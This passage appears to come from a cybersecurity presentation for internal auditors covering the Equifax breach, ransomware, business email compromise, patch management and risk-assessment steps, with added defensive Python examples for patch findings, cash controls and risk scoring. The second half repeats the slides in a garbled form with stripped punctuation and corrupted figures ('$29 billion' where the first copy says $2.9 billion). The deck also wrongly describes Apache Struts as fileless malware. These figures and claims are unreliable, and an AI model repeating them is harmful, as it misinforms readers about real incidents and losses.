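        elif (as_of - d.last_scanned).days > MAX_SCAN_AGE_DAYS:
            findings.append(Finding(d.name, "not scanned", "medium", (as_of - d.last_scanned).days,
                                    "last scan older than %d days" % MAX_SCAN_AGE_DAYS))
        # 2. Is it running the vendor's latest release?
        behind = d.installed_patch is None or d.installed_patch < d.latest_vendor_patch
        if not behind:
            continue
        lag = (as_of - d.latest_vendor_patch).days
        if lag <= PATCH_WINDOW_DAYS[d.internet_facing]:
            continue  # still inside the agreed patch window
        # 3. Unpatched: is the risk formally accepted and still in force?
        expiry = acceptances.get(d.name)
        if expiry is not None and expiry >= as_of:
            findings.append(Finding(d.name, "unpatched", "accepted", lag, f"risk acceptance on file until {expiry}"))
            continue
        if lag > ONE_YEAR:
            severity = "critical"      # the window in which most exploitation happens, per the deck
        elif d.internet_facing:
            severity = "high"
        else:
            severity = "medium"
        detail = "patch available %d days" % lag + (", acceptance expired" if expiry else "")
        findings.append(Finding(d.name, "unpatched", severity, lag, detail))
    return findings


# Constructed inventory (hostnames and dates are illustrative).
AS_OF = date(2024, 3, 1)
DEVICES = [
    Device("web-01", "server", True, date(2024, 2, 10), date(2024, 2, 10), date(2024, 2, 27)),
    Device("vpn-gw-01", "appliance", True, date(2024, 2, 25), date(2024, 1, 10), date(2024, 2, 28)),
    Device("fileserver-02", "server", False, date(2023, 1, 15), date(2022, 11, 1), date(2024, 2, 20)),
    Device("core-switch-01", "network", False, date(2024, 1, 20), date(2023, 12, 1), None),
    Device("legacy-hmi-01", "workstation", False, date(2021, 5, 1), None, date(2024, 2, 20)),
]
RISK_ACCEPTANCES = {"legacy-hmi-01": date(2024, 6, 30)}  # constructed: signed acceptance, reviewed annually

if __name__ == "__main__":
    for f in assess_patch_management(DEVICES, RISK_ACCEPTANCES, AS_OF):
        print(f"{f.severity:9} {f.device:15} {f.issue:12} {f.detail}")
```

The inputs map onto the questions in the bullets: the scanner export answers "do we know all our devices", the vendor release versus installed version answers "is patching effective", and the acceptance register with expiry dates answers "are unpatched risks formally accepted and tracked" rather than silently forgotten.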
47
CYBERSECURITY – SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANY:
• Obtain a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Understand your company's fundamental process around patch management and focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
• Understand the coverage and terms of your company's cyber insurance policy
• Assess the requirement for multi-factor authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco, Principal – mobile (918) 625-8870
davidlosacco@stinnett-associates.com
Stinnett & Associates – stinnett-associates.com
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
20
COMPLEXITY BEHIND THE EQUIFAX ATTACK
• The attack started in early March 2017 with hackers using a bot programmed to search the web for a recently released CVE (Common Vulnerabilities and Exposures) entry
• It took the hackers two months before they found the vulnerability on one of Equifax's websites used to help customers with claims
• Hackers then used another vulnerability (a fileless malware named Apache Struts) that was also a CVE that had been issued a month before but never fixed
• Hackers spent an estimated 76 days in the network and downloaded records from 51 different databases
• Over 148 million records were stolen
• The attack was not identified until July 30, 2017
21
EQUIFAX – WHAT WAS LOST
In addition to US consumers, the UK Data Protection Authority, the Information Commissioner's Office, reported:
• Approximately 20,000 UK data subjects had names, dates of birth, telephone numbers and driving license numbers exposed
• More than 600,000 UK data subjects had names, dates of birth and telephone numbers exposed
• Up to 15 million UK data subjects had names and dates of birth exposed
22
COMMON TERMS AND DEFINITIONS
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities, such as black-market purchasing of stolen PII or credit card data as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released into circulation; it involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
23
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decryption key.
• The use of BITCOINS is typically the payment method
• Ransomware attacks were growing at a rate of 350% annually until 2017 and have now dropped, but are still present (HR and healthcare companies, both in February)
• The WannaCry ransomware attack impacted over 200,000 people across 150 countries (it included a worm)
24
RANSOMWARE
Ransomware-as-a-Service allows any amateur attacker to get into the business with basic knowledge and less effort. The amateur attacker can visit a RaaS site on the dark web and set up an account to create the ransomware package. It is up to the attacker to distribute the ransomware, while the RaaS will handle the ransom payments. The RaaS developer takes a cut of any payments that are made. The developer will also reduce their cut depending on the volume of payments received.
25
BUSINESS EMAIL COMPROMISE (BEC)
• Business Email Compromise (BEC) is an exploit targeting a company's corporate email accounts and impersonating or "spoofing" the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company, its business partners and/or employees
• The FBI's Internet Crime Complaint Center, or IC3, said that based on fraud reports submitted from October 2013 to May 2018 there were 41,058 total US victims of BEC schemes, which collectively lost at least $2.9 billion, while global losses were more than four times that amount (FBI: Global Business Email Compromise Losses Hit $12.5 Billion)
• BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (https://www.sec.gov/litigation/investreport/34-84429.pdf). The report was considered a "highly unusual action" by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
  • All nine lost at least $1 million due to BEC scams
  • Two companies lost more than $30 million each
  • In total the nine issuers lost almost $100 million
26
BEC & PHISHING
Phishing – A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient into opening the attachment.
Spear Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include cloning (using a previous legitimate email) and whaling (attacking a high-level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing for data (the IRS sent out a warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
27
PHISHING EMAIL EXAMPLE
Most companies battle the increased phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
This "band-aid" is still widely in practice today, however
28
BEC & OFFICE 365
• Office 365 is Microsoft's cloud-based solution offering everything from email and Excel to cloud storage
• Microsoft Office 365 is now in use at over 70% of Fortune 500 companies
• 20% of all companies use Office 365
• Office 365 overtook Office products in the 4th quarter of 2017 as the largest revenue stream for Microsoft
• Most companies do not correctly set up Office 365 security or logging
• Significant increase in attack vectors against Office 365
• It only takes one employee and the hacker is internal to email and Office 365
• Some attack vectors do not require a phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC – PROTECT YOUR CASH
Accounting controls at all entry/exit points for cash
Cash Receipts
• Review of balances over 60 days and $10k – a triggered review and communication uncovered a change in bank info (communication was being sent to a deleted email)
• Reports that generate overdue receivables timely for follow-up
• Escalation rules for overdue receivables
Cash Disbursement
• SOD – limit access to the vendor master file
• Controls related to changing bank info for all vendors – need more than email communication; personal verification with the vendor requesting the change
• Vendor set-up – verification of the information provided
• ISNetworld – vetting process for vendors; could require vetting prior to set-up as vendors
• ACH debits – no reason to give debit access to the account; if done, dual approval and a ZBA should be used
• Multi-factor authentication
Other Processes to Consider
• Treasury
• Payroll
• Royalties
• SOX Impact
• Cyber Insurance
• Legal Liabilities
• Contract Language
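Two of the controls on this slide are simple enough to run as routine review rules rather than manual checks: the over-60-days-and-$10k receivables review, and the rule that a vendor bank-detail change is never acted on from an email alone. The following is an added example of both, not code from the presentation or from Stinnett & Associates. The thresholds, the "two distinct approvers" requirement, and the customers, vendors, amounts and dates are constructed assumptions.

```python
"""Cash-control checks from the BEC slide as automated review rules.

Added example; not from the presentation. Rule 1: receivables older than
60 days and at least $10k go on a list for direct customer contact. Rule 2:
a vendor bank-detail change is held until it has been verified by a call to
a number already held in the vendor master (not one supplied in the request)
and approved by two different people. All data below is constructed.
"""
from dataclasses import dataclass
from datetime import date
from typing import List, Tuple


@dataclass(frozen=True)
class Receivable:
    customer: str
    invoice: str
    amount: float
    invoice_date: date


@dataclass(frozen=True)
class BankChangeRequest:
    vendor: str
    requested_via: str                 # "email", "portal", "letter" ...
    callback_verified: bool            # vendor called back on the number held in the vendor master file
    approvers: Tuple[str, ...] = ()    # who approved releasing the change


def receivables_for_review(items: List[Receivable], as_of: date,
                           min_days: int = 60, min_amount: float = 10_000.0):
    """Balances older than min_days AND at least min_amount (assumed thresholds)."""
    review = []
    for r in items:
        age = (as_of - r.invoice_date).days
        if age > min_days and r.amount >= min_amount:
            review.append((r.customer, r.invoice, age, r.amount))
    return review


def bank_change_exceptions(requests: List[BankChangeRequest]) -> List[Tuple[str, List[str]]]:
    """Requests that must not be processed yet, with the control each is missing."""
    exceptions = []
    for req in requests:
        missing = []
        if not req.callback_verified:
            missing.append("no out-of-band verification with the vendor (email alone is not enough)")
        if len(set(req.approvers)) < 2:   # the same person approving twice does not count
            missing.append("dual approval missing")
        if missing:
            exceptions.append((req.vendor, missing))
    return exceptions


# Constructed sample data.
AS_OF = date(2024, 2, 15)
RECEIVABLES = [
    Receivable("Northwind Traders", "INV-1001", 25_000.0, date(2023, 11, 15)),  # 92 days, over $10k
    Receivable("Contoso Ltd", "INV-1002", 8_000.0, date(2023, 11, 12)),         # old but under $10k
    Receivable("Fabrikam Inc", "INV-1003", 40_000.0, date(2024, 1, 1)),         # large but only 45 days
    Receivable("Tailspin Toys", "INV-1004", 10_000.0, date(2023, 12, 17)),      # exactly 60 days: not yet "over"
]
BANK_CHANGES = [
    BankChangeRequest("Acme Supply", "email", True, ("ap.clerk", "ap.manager")),
    BankChangeRequest("Globex Corp", "email", False, ("ap.clerk", "ap.manager")),
    BankChangeRequest("Initech", "portal", True, ("ap.clerk", "ap.clerk")),      # same person twice
]

if __name__ == "__main__":
    for customer, inv, age, amt in receivables_for_review(RECEIVABLES, AS_OF):
        print(f"REVIEW  {customer} {inv}: {age} days, ${amt:,.0f} - confirm remittance details by phone")
    for vendor, missing in bank_change_exceptions(BANK_CHANGES):
        print(f"HOLD    {vendor}: " + "; ".join(missing))
```

The receivables rule is what surfaced the incident described above: an overdue balance prompts a phone call to the customer, which is where a redirected remittance or a changed bank account comes to light.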
31
AND MULTI-FACTOR AUTHENTICATION
• Google has not had any of its 85,000+ employees successfully phished on their work-related accounts since early 2017, when it began requiring all employees to use physical security keys in place of passwords and one-time codes
• Office 365 and other cloud-based services should all use multi-factor authentication
32
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach.
The main reasons for companies' struggles are:
• Lack of skilled resources (people and time)
• Lack of funds
• Continued innovations in technology
• Expansion of the attack surface
• Lack of understanding of the company's information assets and their value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
33
DEFENSE IN-DEPTH APPROACH
The Defense-in-Depth approach to cybersecurity is a layered approach that recognizes a company's first line of defense may fail and integrates multiple layers of defense around a company's information assets. Also called the Castle Approach (once you breach the walls, more defenses are in place).
Areas to evaluate:
• Patch Management
• Network Vulnerability Scanning
• Internal & External Network Boundaries
• Firewall Implementation and Monitoring (including NextGen)
• Firewall Dataflow & Standards Documentation
• Security Incident Management
• Evaluation of Encryption Technologies
• Workstation Endpoint Protection
• Operating System EOL
• Security Staffing
• Wireless Security
• IPS / IDS / SIEM Implementations
• Cloud Service Provider Evaluations
• Physical Security
• Network Access Control
CYBERSECURITY DEFENSE IN-DEPTH
People / Technology / Processes
THE PEOPLE CHALLENGE – Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE – The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE – Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
35
WHERE AUDIT CAN HELP
Step 1 - Identify risks through a formal risk assessment of assets
Step 2 - Perform a baseline gap analysis of the current control environment against industry-standard frameworks and identify the controls that need to be implemented to reduce the risk of cybersecurity incidents affecting critical data assets
Step 3 - Make recommendations on the implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
Cycle: Risk Assessments → Create a Baseline / Gap Analysis → Implement and Manage Controls → Assess & Report → (repeat)
36
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist
• The risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event
• Consider using a threat modeling tool to semi-qualitatively measure cybersecurity risks, that is, to identify, estimate and prioritize information security risks
Process: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
• Credit card data
• Employee or customer records
• Bank accounts
• Intellectual property
• Trade secrets
• Insider knowledge
• Data location
• Cash in / cash out processes
• Who would want the data?
37
38
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Through formal risk assessments with all critical functions in the business, identify where data lives and how the data should be classified, then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring. This allows you to determine the critical data assets in your environment that are most at risk of a cybersecurity incident.
• Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
Example screenshot of a critical data asset risk assessment
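The Step 1 slides above (classify each asset, rate each threat, produce a calculated risk result) and the Step 3 "Mitigating Control Counts" method earlier on the page (steps A to D: keep systems with a calculated risk over 100, keep the specific threats over 100, map each to mitigating controls, and total how often each control reduces risk) describe one pipeline. The following is an added example of that pipeline end to end, not code from the presentation or from Stinnett & Associates. The scoring formula (likelihood 1-5 times impact 1-5 times a classification weight 1-5, so 125 is the maximum and the deck's threshold of 100 isolates the most critical pairs), the classification weights, the threat-to-control mapping and the sample assets are all constructed assumptions; a real assessment would substitute the organization's own scheme and the output of its threat modeling tool.

```python
"""Semi-quantitative risk assessment feeding a Step 3 controls analysis.

Added example; not from the presentation. The scoring model is an assumption:
    risk = likelihood (1-5) x impact (1-5) x classification weight (1-5)
so the maximum is 125 and the deck's ">100" threshold isolates the most
critical asset/threat pairs. Assets, ratings and control mappings are
constructed sample data.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, NamedTuple, Tuple

RISK_THRESHOLD = 100  # from the deck: "calculated cybersecurity risk > 100"

# Assumed classification weights; substitute the organization's own scheme.
CLASSIFICATION_WEIGHT = {"public": 1, "internal": 2, "confidential": 4, "restricted": 5}

# Assumed threat-to-control mapping (control names loosely follow CIS CSC topics).
MITIGATING_CONTROLS: Dict[str, List[str]] = {
    "ransomware": ["Endpoint protection", "Offline backups", "Patch management", "User awareness training"],
    "phishing / BEC": ["MFA", "User awareness training", "External email labeling"],
    "exploited unpatched vulnerability": ["Patch management", "Vulnerability scanning"],
    "privileged account misuse": ["Least privilege review", "Privileged access monitoring"],
}


@dataclass(frozen=True)
class Asset:
    name: str
    owner: str            # business function interviewed during the risk assessment
    location: str         # where the data lives
    classification: str   # key into CLASSIFICATION_WEIGHT


@dataclass(frozen=True)
class ThreatRating:
    threat: str           # key into MITIGATING_CONTROLS
    likelihood: int       # 1 (rare) .. 5 (almost certain)
    impact: int           # 1 (negligible) .. 5 (severe)


class ControlsAnalysis(NamedTuple):
    systems_over_threshold: List[str]                      # Step A
    prioritized: List[Tuple[str, str, int, List[str]]]     # Steps B/C: (asset, threat, risk, controls)
    control_counts: Counter                                # Step D


def calculated_risk(asset: Asset, rating: ThreatRating) -> int:
    """Step 1 'calculated risk result' for one asset/threat pair (assumed formula)."""
    for value in (rating.likelihood, rating.impact):
        if not 1 <= value <= 5:
            raise ValueError("likelihood and impact must be rated 1-5")
    return rating.likelihood * rating.impact * CLASSIFICATION_WEIGHT[asset.classification]


def controls_analysis(assessment: List[Tuple[Asset, List[ThreatRating]]]) -> ControlsAnalysis:
    """Steps A-D of the deck's Mitigating Control Counts method."""
    systems: List[str] = []
    prioritized = []
    counts: Counter = Counter()
    for asset, ratings in assessment:
        scores = [(r, calculated_risk(asset, r)) for r in ratings]
        # A) information systems whose calculated risk exceeds the threshold
        if not any(score > RISK_THRESHOLD for _, score in scores):
            continue
        systems.append(asset.name)
        for rating, score in scores:
            # B) only the specific threats that individually exceed the threshold
            if score <= RISK_THRESHOLD:  # a score of exactly 100 is not "over 100"
                continue
            # C) mitigating controls that address this threat
            controls = MITIGATING_CONTROLS.get(rating.threat, [])
            prioritized.append((asset.name, rating.threat, score, controls))
            # D) tally every instance in which a control reduces risk
            counts.update(controls)
    return ControlsAnalysis(systems, prioritized, counts)


# Constructed sample assessment (names and ratings are illustrative only).
SAMPLE_ASSESSMENT = [
    (Asset("Customer billing database", "Finance", "on-prem datacenter", "restricted"), [
        ThreatRating("ransomware", 4, 5),                          # 100: boundary, not over
        ThreatRating("exploited unpatched vulnerability", 5, 5),   # 125
        ThreatRating("phishing / BEC", 3, 4),                      # 60
    ]),
    (Asset("HR employee records", "HR", "SaaS HRIS", "restricted"), [
        ThreatRating("phishing / BEC", 5, 5),                      # 125
        ThreatRating("ransomware", 3, 4),                          # 60
    ]),
    (Asset("Treasury payment portal", "Treasury", "bank-hosted", "restricted"), [
        ThreatRating("phishing / BEC", 5, 5),                      # 125
        ThreatRating("privileged account misuse", 5, 5),           # 125
    ]),
    (Asset("Marketing website", "Marketing", "hosted CMS", "public"), [
        ThreatRating("exploited unpatched vulnerability", 5, 3),   # 15
    ]),
]

if __name__ == "__main__":
    result = controls_analysis(SAMPLE_ASSESSMENT)
    print("Systems over threshold:", result.systems_over_threshold)
    for asset, threat, score, controls in result.prioritized:
        print(f"  {asset} / {threat}: risk {score} -> {', '.join(controls)}")
    print("Mitigating control counts:")
    for control, n in result.control_counts.most_common():
        print(f"  {n}  {control}")
```

The counts are the ranking the Step 3 chart shows: a control that appears against several over-threshold asset/threat pairs (MFA and user awareness training in this sample) reduces risk for the greatest number of critical data assets and is what IT management and audit would schedule first on the implementation roadmap.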
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
STEP 1 - CYBERSECURITY RISK ASSESSMENT
• Perform risk assessments to understand the organizational risk and where high-risk assets exist.
• The risk assessment should include interviews with departments outside of IT to ensure all critical data asset types are identified.
• Work with IT to classify each of the asset types to assist in measuring the overall risk of a cybersecurity event.
• Consider using a threat modeling tool to semi-quantitatively measure cybersecurity risks, i.e. to identify, estimate and prioritize information security risks.
Flow: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results.
